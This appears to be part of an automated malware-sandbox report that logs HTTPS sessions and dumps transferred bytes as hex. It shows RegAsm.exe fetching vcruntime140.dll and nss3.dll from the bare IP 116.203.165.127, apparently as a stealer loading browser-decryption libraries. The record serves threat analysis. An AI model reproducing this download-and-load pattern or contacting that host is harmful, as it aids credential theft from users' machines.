                                                                                                                                                                                                                                2024-09-21 11:35:12 UTC16384INData Raw: 40 04 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8
                                                                                                                                                                                                                                Data Ascii: @EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGP
                                                                                                                                                                                                                                2024-09-21 11:35:12 UTC16384INData Raw: 02 10 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00
                                                                                                                                                                                                                                Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
                                                                                                                                                                                                                                2024-09-21 11:35:12 UTC16384INData Raw: c0 0f 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23
                                                                                                                                                                                                                                Data Ascii: 0{C!=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#
                                                                                                                                                                                                                                2024-09-21 11:35:12 UTC16384INData Raw: 5f 5b 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00
                                                                                                                                                                                                                                Data Ascii: _[]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=P
                                                                                                                                                                                                                                2024-09-21 11:35:12 UTC16384INData Raw: 77 8b 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00
                                                                                                                                                                                                                                Data Ascii: wu ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZ
                                                                                                                                                                                                                                2024-09-21 11:35:12 UTC16384INData Raw: 37 ff 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00
                                                                                                                                                                                                                                Data Ascii: 7uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
                                                                                                                                                                                                                                2024-09-21 11:35:12 UTC16384INData Raw: 40 00 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15
                                                                                                                                                                                                                                Data Ascii: @]]USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4
                                                                                                                                                                                                                                2024-09-21 11:35:12 UTC16384INData Raw: e4 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25
                                                                                                                                                                                                                                Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                24192.168.2.949780116.203.165.1274435752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:35:13 UTC204OUTGET /vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                Host: 116.203.165.127
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:35:15 UTC261INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:35:14 GMT
                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                Content-Length: 80880
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Last-Modified: Saturday, 21-Sep-2024 11:35:14 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                2024-09-21 11:35:15 UTC16123INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                                                                                                                                                                                2024-09-21 11:35:15 UTC16384INData Raw: 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c
                                                                                                                                                                                                                                Data Ascii: +t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F
                                                                                                                                                                                                                                2024-09-21 11:35:15 UTC16384INData Raw: 75 08 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01
                                                                                                                                                                                                                                Data Ascii: uEEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMG
                                                                                                                                                                                                                                2024-09-21 11:35:15 UTC16384INData Raw: d0 81 c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f
                                                                                                                                                                                                                                Data Ascii: ttt@++t+t+u+uQ<0|*<9&w/c5~bASJCtv


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                25192.168.2.949781116.203.165.1274435752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:35:16 UTC196OUTGET /nss3.dll HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                Host: 116.203.165.127
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:35:17 UTC263INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:35:17 GMT
                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                Content-Length: 2046288
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Last-Modified: Saturday, 21-Sep-2024 11:35:17 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                2024-09-21 11:35:17 UTC16121INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                                                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                                                                                                                                                                                2024-09-21 11:35:17 UTC16384INData Raw: 1f 01 f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a
                                                                                                                                                                                                                                Data Ascii: kd)i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MA
                                                                                                                                                                                                                                2024-09-21 11:35:17 UTC16384INData Raw: 52 f4 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45
                                                                                                                                                                                                                                Data Ascii: RQ=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                                                                                                                                                                                2024-09-21 11:35:17 UTC16384INData Raw: 40 a1 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10
                                                                                                                                                                                                                                Data Ascii: @@;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
                                                                                                                                                                                                                                2024-09-21 11:35:17 UTC16384INData Raw: ff 8b 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd
                                                                                                                                                                                                                                Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
                                                                                                                                                                                                                                2024-09-21 11:35:17 UTC16384INData Raw: 18 89 d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3
                                                                                                                                                                                                                                Data Ascii: %D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
                                                                                                                                                                                                                                2024-09-21 11:35:17 UTC16384INData Raw: 64 8b 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b
                                                                                                                                                                                                                                Data Ascii: d8C0;^h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$
